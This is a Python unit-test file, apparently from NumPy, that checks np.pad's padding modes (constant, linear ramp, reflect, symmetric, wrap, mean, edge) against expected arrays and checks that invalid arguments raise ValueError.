def test_check_constant_zeros(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant')
b = np.array(
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_constant_float(self):
# If input array is int, but constant_values are float, the dtype of
# the array to be padded is kept
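        # For instance, by the same rule asserted below,
        # np.pad(np.array([1, 2]), 1, 'constant', constant_values=0.5)
        # would stay int and give array([0, 1, 2, 0]).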
arr = np.arange(30).reshape(5, 6)
test = pad(arr, (1, 2), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 0, 1, 2, 3, 4, 5, 1, 1],
[ 1, 6, 7, 8, 9, 10, 11, 1, 1],
[ 1, 12, 13, 14, 15, 16, 17, 1, 1],
[ 1, 18, 19, 20, 21, 22, 23, 1, 1],
[ 1, 24, 25, 26, 27, 28, 29, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1]]
)
assert_allclose(test, expected)
def test_check_constant_float2(self):
# If input array is float, and constant_values are float, the dtype of
# the array to be padded is kept - here retaining the float constants
arr = np.arange(30).reshape(5, 6)
arr_float = arr.astype(np.float64)
test = pad(arr_float, ((1, 2), (1, 2)), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 0. , 1. , 2. , 3. , 4. , 5. , 1.1, 1.1],
[ 1.1, 6. , 7. , 8. , 9. , 10. , 11. , 1.1, 1.1],
[ 1.1, 12. , 13. , 14. , 15. , 16. , 17. , 1.1, 1.1],
[ 1.1, 18. , 19. , 20. , 21. , 22. , 23. , 1.1, 1.1],
[ 1.1, 24. , 25. , 26. , 27. , 28. , 29. , 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1]]
)
assert_allclose(test, expected)
def test_check_constant_float3(self):
a = np.arange(100, dtype=float)
a = pad(a, (25, 20), 'constant', constant_values=(-1.1, -1.2))
b = np.array(
[-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
-1.1, -1.1, -1.1, -1.1, -1.1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
-1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2,
-1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2]
)
assert_allclose(a, b)
def test_check_constant_odd_pad_amount(self):
arr = np.arange(30).reshape(5, 6)
test = pad(arr, ((1,), (2,)), mode='constant',
constant_values=3)
expected = np.array(
[[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[ 3, 3, 0, 1, 2, 3, 4, 5, 3, 3],
[ 3, 3, 6, 7, 8, 9, 10, 11, 3, 3],
[ 3, 3, 12, 13, 14, 15, 16, 17, 3, 3],
[ 3, 3, 18, 19, 20, 21, 22, 23, 3, 3],
[ 3, 3, 24, 25, 26, 27, 28, 29, 3, 3],
[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]]
)
assert_allclose(test, expected)
def test_check_constant_pad_2d(self):
arr = np.arange(4).reshape(2, 2)
test = np.lib.pad(arr, ((1, 2), (1, 3)), mode='constant',
constant_values=((1, 2), (3, 4)))
expected = np.array(
[[3, 1, 1, 4, 4, 4],
[3, 0, 1, 4, 4, 4],
[3, 2, 3, 4, 4, 4],
[3, 2, 2, 4, 4, 4],
[3, 2, 2, 4, 4, 4]]
)
assert_allclose(test, expected)
class TestLinearRamp(TestCase):
def test_check_simple(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'linear_ramp', end_values=(4, 5))
b = np.array(
[4.00, 3.84, 3.68, 3.52, 3.36, 3.20, 3.04, 2.88, 2.72, 2.56,
2.40, 2.24, 2.08, 1.92, 1.76, 1.60, 1.44, 1.28, 1.12, 0.96,
0.80, 0.64, 0.48, 0.32, 0.16,
0.00, 1.00, 2.00, 3.00, 4.00, 5.00, 6.00, 7.00, 8.00, 9.00,
10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0,
20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0, 27.0, 28.0, 29.0,
30.0, 31.0, 32.0, 33.0, 34.0, 35.0, 36.0, 37.0, 38.0, 39.0,
40.0, 41.0, 42.0, 43.0, 44.0, 45.0, 46.0, 47.0, 48.0, 49.0,
50.0, 51.0, 52.0, 53.0, 54.0, 55.0, 56.0, 57.0, 58.0, 59.0,
60.0, 61.0, 62.0, 63.0, 64.0, 65.0, 66.0, 67.0, 68.0, 69.0,
70.0, 71.0, 72.0, 73.0, 74.0, 75.0, 76.0, 77.0, 78.0, 79.0,
80.0, 81.0, 82.0, 83.0, 84.0, 85.0, 86.0, 87.0, 88.0, 89.0,
90.0, 91.0, 92.0, 93.0, 94.0, 95.0, 96.0, 97.0, 98.0, 99.0,
94.3, 89.6, 84.9, 80.2, 75.5, 70.8, 66.1, 61.4, 56.7, 52.0,
47.3, 42.6, 37.9, 33.2, 28.5, 23.8, 19.1, 14.4, 9.7, 5.]
)
assert_allclose(a, b, rtol=1e-5, atol=1e-5)
def test_check_2d(self):
arr = np.arange(20).reshape(4, 5).astype(np.float64)
test = pad(arr, (2, 2), mode='linear_ramp', end_values=(0, 0))
expected = np.array(
[[0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0.5, 1., 1.5, 2., 1., 0.],
[0., 0., 0., 1., 2., 3., 4., 2., 0.],
[0., 2.5, 5., 6., 7., 8., 9., 4.5, 0.],
[0., 5., 10., 11., 12., 13., 14., 7., 0.],
[0., 7.5, 15., 16., 17., 18., 19., 9.5, 0.],
[0., 3.75, 7.5, 8., 8.5, 9., 9.5, 4.75, 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0.]])
assert_allclose(test, expected)
class TestReflect(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'reflect')
b = np.array(
[25, 24, 23, 22, 21, 20, 19, 18, 17, 16,
15, 14, 13, 12, 11, 10, 9, 8, 7, 6,
5, 4, 3, 2, 1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
98, 97, 96, 95, 94, 93, 92, 91, 90, 89,
88, 87, 86, 85, 84, 83, 82, 81, 80, 79]
)
assert_array_equal(a, b)
def test_check_odd_method(self):
a = np.arange(100)
a = pad(a, (25, 20), 'reflect', reflect_type='odd')
b = np.array(
[-25, -24, -23, -22, -21, -20, -19, -18, -17, -16,
-15, -14, -13, -12, -11, -10, -9, -8, -7, -6,
-5, -4, -3, -2, -1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
100, 101, 102, 103, 104, 105, 106, 107, 108, 109,
110, 111, 112, 113, 114, 115, 116, 117, 118, 119]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'reflect')
b = np.array(
[[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_shape(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'reflect')
b = np.array(
[[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 2, 'reflect')
b = np.array([3, 2, 1, 2, 3, 2, 1])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 3, 'reflect')
b = np.array([2, 3, 2, 1, 2, 3, 2, 1, 2])
assert_array_equal(a, b)
def test_check_03(self):
a = pad([1, 2, 3], 4, 'reflect')
b = np.array([1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3])
assert_array_equal(a, b)
def test_check_padding_an_empty_array(self):
a = pad(np.zeros((0, 3)), ((0,), (1,)), mode='reflect')
b = np.zeros((0, 5))
assert_array_equal(a, b)
class TestSymmetric(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'symmetric')
b = np.array(
[24, 23, 22, 21, 20, 19, 18, 17, 16, 15,
14, 13, 12, 11, 10, 9, 8, 7, 6, 5,
4, 3, 2, 1, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 98, 97, 96, 95, 94, 93, 92, 91, 90,
89, 88, 87, 86, 85, 84, 83, 82, 81, 80]
)
assert_array_equal(a, b)
def test_check_odd_method(self):
a = np.arange(100)
a = pad(a, (25, 20), 'symmetric', reflect_type='odd')
b = np.array(
[-24, -23, -22, -21, -20, -19, -18, -17, -16, -15,
-14, -13, -12, -11, -10, -9, -8, -7, -6, -5,
-4, -3, -2, -1, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 100, 101, 102, 103, 104, 105, 106, 107, 108,
109, 110, 111, 112, 113, 114, 115, 116, 117, 118]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'symmetric')
b = np.array(
[[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6]]
)
assert_array_equal(a, b)
def test_check_large_pad_odd(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'symmetric', reflect_type='odd')
b = np.array(
[[-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6],
[-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6],
[-1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8],
[-1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8],
[ 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10],
[ 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10],
[ 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12],
[ 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12],
[ 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14],
[ 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14],
[ 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16],
[ 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16],
[ 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16, 17, 18, 18],
[ 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16, 17, 18, 18]]
)
assert_array_equal(a, b)
def test_check_shape(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'symmetric')
b = np.array(
[[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 2, 'symmetric')
b = np.array([2, 1, 1, 2, 3, 3, 2])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 3, 'symmetric')
b = np.array([3, 2, 1, 1, 2, 3, 3, 2, 1])
assert_array_equal(a, b)
def test_check_03(self):
a = pad([1, 2, 3], 6, 'symmetric')
b = np.array([1, 2, 3, 3, 2, 1, 1, 2, 3, 3, 2, 1, 1, 2, 3])
assert_array_equal(a, b)
class TestWrap(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'wrap')
b = np.array(
[75, 76, 77, 78, 79, 80, 81, 82, 83, 84,
85, 86, 87, 88, 89, 90, 91, 92, 93, 94,
95, 96, 97, 98, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = np.arange(12)
a = np.reshape(a, (3, 4))
a = pad(a, (10, 12), 'wrap')
b = np.array(
[[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 3, 'wrap')
b = np.array([1, 2, 3, 1, 2, 3, 1, 2, 3])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 4, 'wrap')
b = np.array([3, 1, 2, 3, 1, 2, 3, 1, 2, 3, 1])
assert_array_equal(a, b)
class TestStatLen(TestCase):
def test_check_simple(self):
a = np.arange(30)
a = np.reshape(a, (6, 5))
a = pad(a, ((2, 3), (3, 2)), mode='mean', stat_length=(3,))
b = np.array(
[[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[1, 1, 1, 0, 1, 2, 3, 4, 3, 3],
[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[11, 11, 11, 10, 11, 12, 13, 14, 13, 13],
[16, 16, 16, 15, 16, 17, 18, 19, 18, 18],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[26, 26, 26, 25, 26, 27, 28, 29, 28, 28],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23]]
)
assert_array_equal(a, b)
class TestEdge(TestCase):
def test_check_simple(self):
a = np.arange(12)
a = np.reshape(a, (4, 3))
a = pad(a, ((2, 3), (3, 2)), 'edge')
b = np.array(
[[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[3, 3, 3, 3, 4, 5, 5, 5],
[6, 6, 6, 6, 7, 8, 8, 8],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11]]
)
assert_array_equal(a, b)
def test_check_width_shape_1_2(self):
# Check a pad_width of the form ((1, 2),).
# Regression test for issue gh-7808.
a = np.array([1, 2, 3])
padded = pad(a, ((1, 2),), 'edge')
expected = np.array([1, 1, 2, 3, 3, 3])
assert_array_equal(padded, expected)
a = np.array([[1, 2, 3], [4, 5, 6]])
padded = pad(a, ((1, 2),), 'edge')
expected = pad(a, ((1, 2), (1, 2)), 'edge')
assert_array_equal(padded, expected)
a = np.arange(24).reshape(2, 3, 4)
padded = pad(a, ((1, 2),), 'edge')
expected = pad(a, ((1, 2), (1, 2), (1, 2)), 'edge')
assert_array_equal(padded, expected)
class TestZeroPadWidth(TestCase):
def test_zero_pad_width(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
for pad_width in (0, (0, 0), ((0, 0), (0, 0))):
assert_array_equal(arr, pad(arr, pad_width, mode='constant'))
class TestLegacyVectorFunction(TestCase):
def test_legacy_vector_functionality(self):
def _padwithtens(vector, pad_width, iaxis, kwargs):
vector[:pad_width[0]] = 10
vector[-pad_width[1]:] = 10
return vector
a = np.arange(6).reshape(2, 3)
a = pad(a, 2, _padwithtens)
b = np.array(
[[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 0, 1, 2, 10, 10],
[10, 10, 3, 4, 5, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10]]
)
assert_array_equal(a, b)
class TestNdarrayPadWidth(TestCase):
def test_check_simple(self):
a = np.arange(12)
a = np.reshape(a, (4, 3))
a = pad(a, np.array(((2, 3), (3, 2))), 'edge')
b = np.array(
[[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[3, 3, 3, 3, 4, 5, 5, 5],
[6, 6, 6, 6, 7, 8, 8, 8],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11]]
)
assert_array_equal(a, b)
class TestUnicodeInput(TestCase):
def test_unicode_mode(self):
constant_mode = u'constant'
a = np.pad([1], 2, mode=constant_mode)
b = np.array([0, 0, 1, 0, 0])
assert_array_equal(a, b)
class ValueError1(TestCase):
def test_check_simple(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((2, 3), (3, 2), (4, 5)),
**kwargs)
def test_check_negative_stat_length(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(-3, ))
assert_raises(ValueError, pad, arr, ((2, 3), (3, 2)),
**kwargs)
def test_check_negative_pad_width(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
**kwargs)
